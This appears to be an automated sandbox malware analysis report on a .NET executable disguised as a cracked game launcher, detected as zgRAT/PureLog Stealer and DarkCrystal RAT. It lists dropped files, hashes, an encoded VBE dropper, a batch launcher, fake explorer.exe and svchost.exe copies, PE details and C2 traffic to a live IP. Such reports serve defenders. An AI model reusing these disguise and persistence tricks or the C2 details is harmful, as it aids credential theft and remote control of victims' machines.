                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f.............................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..4.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                          C:\Windows\appcompat\d612fdb7e553d0

                                                          Download File
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:ASCII text, with very long lines (560), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):560
                                                          Entropy (8bit):5.862116915795869
                                                          Encrypted:false
                                                          SSDEEP:12:Qu9Ua2/BXCTKwaElmC7Mvd4T/pZzJyUSy6uEqI0hbIn:4a2NAuC7MuT/Lwy6uEd0Gn
                                                          MD5:D921DDCE81871202BABF01AC874E8F6A
                                                          SHA1:DA175FF51427BCA8AB2AE3B7D7A3A1E2D80DB00E
                                                          SHA-256:F08E905615074F730EC3225E1D289D97D7D0C24483009C365C0FD69B200ACA90
                                                          SHA-512:B062CE45B01A11E7D6F34AB1FAED3982F7730C8034562556AC81B68092C984ED3B9C76C778329D4BF8828118E71DDF2C7971752F2BF4C6E4D0747522D2904EE1
                                                          Malicious:false
                                                          Preview:QHawVg1741z6s1etcEIHoi3W29UzG1Jec6v7TPVpHZ7IMv8oMT7z833rOE4VLB0CsVewFgaMsc9PlvJHBqnx4UfjCDtPVAdFj4Z1QMip3vGg3oFd5xUfYCIX05tBwK0s94prVS0zH84IN8pY7QUiq8rgvBBVch2s4Yg88YHm6eXZI9K1PUDg0SCBMJ5TQeWkFMOzcqajIrlLkRYw1KGIdW1mWfwydyWcIxU5vUZi4eYJq0a5uJbGYOGsUld64lGTUJDw7cAgvhN97s5fF1ETWPD3qllJ1cnSXEyhxo8SJ5V0AHulq81Dhw7FFJFV10pS45l34Yra3vKb4N3j09d2lkvkHtboimaSPC6Fg1qRRaKvmfK1Qge1WwqTJAwL6D1QV1L1RxC9TLlLaA8likYCIj5cWm5gEeVOi3auUSkcdfiKLf3JBLnWoyIw6tfp1g4y0XmgjOQP95jmAuR0swe318jtuoykx4k6ltUx3Wjx4XWtPfvLbo7FCA61y2v5ZqcFVnBQae7VNq8em0eO2nJI7f3kxc8AlnXO4RXmeeu7rl1VBcP8

                                                          C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe

                                                          Download File
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1916416
                                                          Entropy (8bit):7.538719704947355
                                                          Encrypted:false
                                                          SSDEEP:24576:PulZDtxsIdGCPzmHkuMk4f4RxoKxLi6TpR2Jcjdsq2Qnkvu0IaVthZbJ8ytHuc8m:GPtx5dxKo+LbxqqfnWucVpbJ8y1G
                                                          MD5:83152560524B250C6C27561117DF37FE
                                                          SHA1:F17613B0D3EC3D46A51DAF0CA011FF7DC8A8D53A
                                                          SHA-256:72BCBCB256F87968AD40AEF6B4DAC464921CE8F66CDC242B65EB6E9F23B3CA80
                                                          SHA-512:7793EB5DCC26A00A0C72A07DD084A99D2B41E87E995A25040DD183BD84E94FCE652EB896F0EAFAA717BD97A67B8D1BB8E7A28B4C7EA4F39C15532881304A218C
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                          • Antivirus: Virustotal, Detection: 56%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................6..........>T... ...`....@.. ....................................@..................................S..K....`.. ............................................................................ ............... ..H............text...D4... ...6.................. ..`.rsrc... ....`.......8..............@....reloc...............<..............@..B................ T......H...........................x..mS.......................................0..........(.... ........8........E....).......9...*...8$...(.... ....~....{....:....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........6......._.......8....r...ps....z*...... ....~....{....:....& ....8....~....:.... ....~....{....9....& ....8........~....(P...~....(T... ....?.... ........8T...~....(H... .... .... ....s....~....(L....... ........8....

                                                          C:\Windows\debug\7a0fd90576e088

                                                          Download File
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:ASCII text, with very long lines (900), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):900
                                                          Entropy (8bit):5.913799658997805
                                                          Encrypted:false
                                                          SSDEEP:24:aYyuUBoSCmQVygTFuxyWz44ryrp7XgNR1by:aYWBoSCmZgTFux7z44xNRVy
                                                          MD5:8095DEA4A93DB89BD3EFF4E24CEF3508
                                                          SHA1:C8898B4B2DDFEC512213F2B8244DED313AC14D30
                                                          SHA-256:59C50C736DFEB41B24A86D6CABDED95FBB866195FC30EA0526B3CF2C6367275E
                                                          SHA-512:3E5D3F24E0D2961F318291E97F01378BE0531A7DDEF3FF644F9F40E8F3F5BF4FEEBDFCC19B37AF61D2300F2A829F884EDF8349E9F205102772C23FB7510B92A1
                                                          Malicious:false
                                                          Preview:tKfcCsRKl1TQZFS4qFzokPVDAcCaomyu2Co5z40ZAgI9nM74zEJ0VLSeybckp0f8CjXWaWEvPaoEHVaxeHlkc8ZqtKGXcQtJAJ7Eykec9Xk4gOWcBoFiP5fDKrnPQrT9qfD7YV94nIlEYeJexnWyKL4Fo44H7OMSElOBLZEpoL4GTapphIbmUeyel7Tea16Y6TAwPITYjqJ9RxvNOOkzwj7kxuZNGjPwOfJAa3aZyDCoVyNxMGPLRHlWVZ8fsGSAbWvvnuwVyKAthTP8glB9TDeH3xpA44qsvCM8DbKbU3XGG2zCK98GESqX1n10Fvb3eR8fGQ5FbkpZqYAB7n046kocVyGZkTVicdmy3T54E3oemQrdnz2c5h73nfJRKgfIPG7NvLHnr50C5K0FHmwua2n5fsKXKnuiYgOfSesbsOu9r48dpDKhtvrWcCrCAtdELRoZ5Uwm4UBMIoOkursGdNynz2CQxqa8vqxZQjiVRhmZtfOyyGRTBWk8dBjDRgzO3Dab1yULIWz6kY4UoOcqYH6ZFy5P9fEurYgpEw79wFLogoYEHPZCEJzwGBWC3FMnSEOL2OP1Rc3S6S2aa0HuGBqiiuiDa4Fr3hWcaMM29hulPh0yI5lC7bgQXqnIqMbWWMYY5aAOoPuiRFSB4t4eTDtcBFEtiEMxGXOCIb2s4WXsq79SXlO6R6DTd6X0WRpkD7c31Q2c0Mk6pBvDFvV70PgJU4jMECWnrxotfGbHtvFEVGnbKUvk5stxbSi6qqXyz7P1WCh9UNNEJbxNRHBuRvr8E1RMhebDYROY1vEHwvPrepn9eUpjomhEPQxfuVbzwKq2MZWfC38fg9eYNRrNz1YvtKIl8jWbUZ5U9uxF8JguoChQvYRcnOA4w4JBQugdggKG

                                                          C:\Windows\debug\explorer.exe

                                                          Download File
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1916416
                                                          Entropy (8bit):7.538719704947355
                                                          Encrypted:false
                                                          SSDEEP:24576:PulZDtxsIdGCPzmHkuMk4f4RxoKxLi6TpR2Jcjdsq2Qnkvu0IaVthZbJ8ytHuc8m:GPtx5dxKo+LbxqqfnWucVpbJ8y1G
                                                          MD5:83152560524B250C6C27561117DF37FE
                                                          SHA1:F17613B0D3EC3D46A51DAF0CA011FF7DC8A8D53A
                                                          SHA-256:72BCBCB256F87968AD40AEF6B4DAC464921CE8F66CDC242B65EB6E9F23B3CA80
                                                          SHA-512:7793EB5DCC26A00A0C72A07DD084A99D2B41E87E995A25040DD183BD84E94FCE652EB896F0EAFAA717BD97A67B8D1BB8E7A28B4C7EA4F39C15532881304A218C
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\debug\explorer.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\debug\explorer.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                          • Antivirus: Virustotal, Detection: 56%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................6..........>T... ...`....@.. ....................................@..................................S..K....`.. ............................................................................ ............... ..H............text...D4... ...6.................. ..`.rsrc... ....`.......8..............@....reloc...............<..............@..B................ T......H...........................x..mS.......................................0..........(.... ........8........E....).......9...*...8$...(.... ....~....{....:....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........6......._.......8....r...ps....z*...... ....~....{....:....& ....8....~....:.... ....~....{....9....& ....8........~....(P...~....(T... ....?.... ........8T...~....(H... .... .... ....s....~....(L....... ........8....

                                                          C:\blockhostnet\2b1188ec723c42

                                                          Download File
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:ASCII text, with very long lines (823), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):823
                                                          Entropy (8bit):5.89179187661525
                                                          Encrypted:false
                                                          SSDEEP:24:fiEs5jJseTeQOymqagWtw9xRdLFp8j5xwb3+xKlUQA63A/O:/sRJnCQFJaT82j503Hw/O
                                                          MD5:1D052ED5F89C08B906A2D9E573E58855
                                                          SHA1:61C9AB5FDC17825F42AAF6E32D8434744890ED82
                                                          SHA-256:10E234C5DA43522314BC80A75BBAD2F6329634E42EBA679CFB63A0C4B08EF8BD
                                                          SHA-512:F18EA686217B2AADAF9DD4808D151E4897054DF18E099CACFE0042ADB2D8084F5C1A721AAEA2324594E1BA142E5A62A5DEDEE58ECFFBC6273C9B0BB610B2C8E0
                                                          Malicious:false
                                                          Preview:X3G9HXiHXvSodDbpDuLvGucE43WhnrHhI3etpQuxQFPn08hOfSuepAsnbBEOABdpougjisAx9YfAeyO6VICV7m1HL1RnLgwOmj9Gc8pwR6eRfrImxI319HsB3YXraWldmRY4zIeXdPEAIkldsp0Dm4Pe17NDk8W5UApOTNxpogYtDr3Sx38ugi0rB3D14axf3IqH5XKe2LYGggbKE4Qq9lZvK7MaK5uNs304BvXZtd2VJtLfb3xAKGfRt477KuU6aLXmpgISg06fsDlawr8QItCmXiLGyaO9J548Wiz5uedTK9ipSgLdvDyrJvPGVCdGm7WxJnEN1DgnPscYAfySPvNFGNykTsjsAXrMmvgoc7lshLbaT0G0NL10tQq6ye3Jdxn1APvP9JzRKei5vXQcmtfyg1cWEjz8EbPuhjaEF10DWjqPsuKbNahtSyVJwZKZU1NsPxYM7MXv3bc6KNnUZYun4gbsOQRqqbteW894W8dBDw00WY8jvz95GjxtWp8r4rEbr7kMOs8a5tjIqkWzRs40byYwKQirAvGWrYJYywUD1j9WAoCvSIZMwN93jxB7JRaJnNbRb7AfX092yBwfNxY1V4jeZPzBuX3kI0twNvTUH4y5NGFhAgtV2iysn62MI9uA7Zu8R9RceDuaGoQSJRAOnhrjBAJR3HMHKy8yWHPBOR1zyXm9qkC09gWZrK6QzAjX1mQRpb5CB9AWq2uoYKkTEVIobjGLL9LNse7MGUTOoAzAfAszaS2paQSfdmzFUu1CywnM4ihD1WoEgIIb1Rv3GfxbLcsefN34JwMtWg42uzyDlO9VeXO

                                                          C:\blockhostnet\dbHnJe8FTGPofdGpjq0jOMhg.vbe

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):196
                                                          Entropy (8bit):5.646965679258475
                                                          Encrypted:false
                                                          SSDEEP:6:GivwqK+NkLzWbHnrFnBaORbM5nCeHt2lSG+HhYWs:Gi2MCzWLnhBaORbQCmdGAhu
                                                          MD5:8F9AFB736D7DCAF92555A19215FA5C7B
                                                          SHA1:F735F020E772AC67B5ED87C15D110973980E271B
                                                          SHA-256:D78691F9757EA266450F639553638BDB3F7383341298578A2F4096A7096B2FB4
                                                          SHA-512:69D27657031B6B8C8C9D266F8498A824A13434D62D80144CB5966E26B4E2B2E2E43247AF31DC5D845B1A771E267E71BA59DCBCB04F532BCE8892A462C035D10B
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Preview:#@~^qwAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v f!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z8^W13tK/DU+Dz&ko?phc4lDE~,!~,WCVk+5DUAAA==^#~@.

                                                          C:\blockhostnet\iXSXm.bat

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):71
                                                          Entropy (8bit):5.09863176058791
                                                          Encrypted:false
                                                          SSDEEP:3:jRWo0o/smhEIaKRQAB8HBA:tWoImV8hA
                                                          MD5:5B64FE1545FBF11EC2BF13E3CF7579DB
                                                          SHA1:BC17A73A181CA2E2DD489173E12861416E6DB274
                                                          SHA-256:579E774B18B84F5D6CBA055A2ED46893B438EE98317EFAFA9837C6E796F6496F
                                                          SHA-512:8E44C179350D5554299C303D54B30C934EFF8ED69F807BB810D93087085909D8306EB0F3A7476FC6707C4565C0958E720B8086E5C038E2F337B79F310203C153
                                                          Malicious:false
                                                          Preview:%WqjLGd%%nsMZ%..%zQnhRHlLwRcpBxb%"C:\blockhostnet/msinto.exe"%JYnVfyiJ%

                                                          C:\blockhostnet\msinto.exe

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1916416
                                                          Entropy (8bit):7.538719704947355
                                                          Encrypted:false
                                                          SSDEEP:24576:PulZDtxsIdGCPzmHkuMk4f4RxoKxLi6TpR2Jcjdsq2Qnkvu0IaVthZbJ8ytHuc8m:GPtx5dxKo+LbxqqfnWucVpbJ8y1G
                                                          MD5:83152560524B250C6C27561117DF37FE
                                                          SHA1:F17613B0D3EC3D46A51DAF0CA011FF7DC8A8D53A
                                                          SHA-256:72BCBCB256F87968AD40AEF6B4DAC464921CE8F66CDC242B65EB6E9F23B3CA80
                                                          SHA-512:7793EB5DCC26A00A0C72A07DD084A99D2B41E87E995A25040DD183BD84E94FCE652EB896F0EAFAA717BD97A67B8D1BB8E7A28B4C7EA4F39C15532881304A218C
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\blockhostnet\msinto.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockhostnet\msinto.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                          • Antivirus: Virustotal, Detection: 56%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................6..........>T... ...`....@.. ....................................@..................................S..K....`.. ............................................................................ ............... ..H............text...D4... ...6.................. ..`.rsrc... ....`.......8..............@....reloc...............<..............@..B................ T......H...........................x..mS.......................................0..........(.... ........8........E....).......9...*...8$...(.... ....~....{....:....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........6......._.......8....r...ps....z*...... ....~....{....:....& ....8....~....:.... ....~....{....9....& ....8........~....(P...~....(T... ....?.... ........8T...~....(H... .... .... ....s....~....(L....... ........8....

                                                          \Device\ConDrv

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\explorer.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):167
                                                          Entropy (8bit):4.737818991476617
                                                          Encrypted:false
                                                          SSDEEP:3:cWsqFrLWVYTqv42OVsAHercfRUovg/GJMALkFVJLCAjMLEJ3rbF:cx+rozOVsLIfRUooOCALK2RLCF
                                                          MD5:6DD26DB185D90DB1D8D8A8A4A708FFCE
                                                          SHA1:5C6233CB2FE5593455FC524BD7673995BE138C37
                                                          SHA-256:01BD8B04B2AC0DF9770C2D75DC9CD3B134F21DE1819B99F1CEB4661B26608E30
                                                          SHA-512:347EBA836A1C746AC9092AA8801342437EC73C55F72B0A780C9E6611B534A46052F54E998C33B763F225456133E821765A8BB710B6A999988DBAEAC6C949B5B8
                                                          Malicious:false
                                                          Preview: .... Nursultan NextGen 1.16.5 -> Launcher.. Cracked by Sk3d Club.... [?] Current memory: 2048.... 1 > Start client... 2 > Change memory..... [?] Select a option:

                                                          \Device\Null

                                                          Download File
                                                          Process:C:\Windows\System32\w32tm.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):151
                                                          Entropy (8bit):4.789320938113328
                                                          Encrypted:false
                                                          SSDEEP:3:VLV993J+miJWEoJ8FXgSzIsXuaNvpGE4qNvj:Vx993DEULSJic
                                                          MD5:7F07E96926A0F7EFEE496D2D88643FBB
                                                          SHA1:DEE048946585B578334B0FEB855EE4D359A7CA8A
                                                          SHA-256:F8954AFA8CBE9C9F10486F9FC161774B1BB030A7DD2AB0C27F2E51F4CD431508
                                                          SHA-512:E5DFA2356E89CB00223270AC9923873FE8117015CA8269139D463AF163E4C29C0600B4ED0DAF5672253B36D12149CFDE9DEECE54EE5196B4604C282D6FBEDDD1
                                                          Malicious:false
                                                          Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 01/10/2024 01:21:34..01:21:34, error: 0x80072746.01:21:39, error: 0x80072746.

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.829184127922152
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.69%
                                                          • Win32 Executable (generic) a (10002005/4) 49.64%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • InstallShield setup (43055/19) 0.21%
                                                          • Windows Screen Saver (13104/52) 0.07%
                                                          File name:Zn0uX5K1ez.exe
                                                          File size:8'034'816 bytes
                                                          MD5:58509394a423edb98b0b1be7f18551ab
                                                          SHA1:4b7a8ff6ec8bd5908e306cb23d2b84ce3ff03ec3
                                                          SHA256:78fee239cf44c2ab923669b8ccf016ef117a9682e339d96de87fa2f0a45200cc
                                                          SHA512:41ec27bb184d55d84b3e7150df35d2229cf93ae389fc4f8b9f8bded29fb730661ddc3a21d6d926f6d98cc169e851e44928fb2058bd898d96924f69e301350b9a
                                                          SSDEEP:196608:GPtx5dUAuaAxSTZLvD6/x1R92cJUMo7xS6:ctx5dUARAh5n9/GMolS6
                                                          TLSH:1F86125972802F35C12545318523A93DA2F1E72A2665EE5F32CBB8C17B177E0CE52FA3
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..................y...........y.. ....z...@.. ....................... {...........`................................

                                                          File Icon

                                                          Icon Hash:66e2a0a0b0aa92b6

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0xb9e29e
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x66DB139A [Fri Sep 6 14:37:14 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x79e24c0x4f.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x7a20000xcc88.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x7b00000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x7a00000x1c.sdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000x79c2a40x79c400d47994deab5dc0b92621ae3ce91f554dunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .sdata0x7a00000x1380x200bdab1a454ea0810fa08c0ac0b823eb2dFalse0.197265625data1.4992511081653355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x7a20000xcc880xce0056dd3ea7815d8d87144bcdd5c7a1b3a2False0.17963061286407767data4.314508822158264IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x7b00000xc0x2005a589ea89ca64d5cf88700bb44d5eac5False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0x7a24c80xeebPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8866195339094004
                                                          RT_ICON0x7a33b80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 00.061230514879546526
                                                          RT_ICON0x7a75e00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.09139004149377593
                                                          RT_ICON0x7a9b880x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 00.11553254437869823
                                                          RT_ICON0x7ab5f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.1376641651031895
                                                          RT_ICON0x7ac6980x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.1918032786885246
                                                          RT_ICON0x7ad0200x6b8Device independent bitmap graphic, 20 x 40 x 32, image size 00.2779069767441861
                                                          RT_ICON0x7ad6d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.30939716312056736
                                                          RT_GROUP_ICON0x7adb400x76data0.7457627118644068
                                                          RT_VERSION0x7a22800x244data0.46551724137931033
                                                          RT_MANIFEST0x7adbb80x10d0XML 1.0 document, Unicode text, UTF-8 (with BOM) text0.40892193308550184

                                                          Imports

                                                          DLLImport
                                                          mscoree.dll_CorExeMain

                                                          Network Behavior

                                                          Suricata IDS Alerts

                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2024-10-01T05:57:31.855707+02002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.64970637.44.238.25080TCP

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 1, 2024 05:57:31.174240112 CEST4970680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:31.179105043 CEST804970637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:31.179223061 CEST4970680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:31.179536104 CEST4970680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:31.184293032 CEST804970637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:31.528407097 CEST4970680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:31.533390045 CEST804970637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:31.810553074 CEST804970637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:31.855706930 CEST4970680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:31.905071974 CEST804970637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:31.905095100 CEST804970637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:31.905172110 CEST4970680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:31.936719894 CEST4970680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:31.941600084 CEST804970637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:32.115212917 CEST804970637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:32.115420103 CEST4970680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:32.120261908 CEST804970637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:32.343812943 CEST4970780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:32.348803997 CEST804970737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:32.348875999 CEST4970780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:32.349009991 CEST4970780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:32.353750944 CEST804970737.44.238.250192.168.2.6
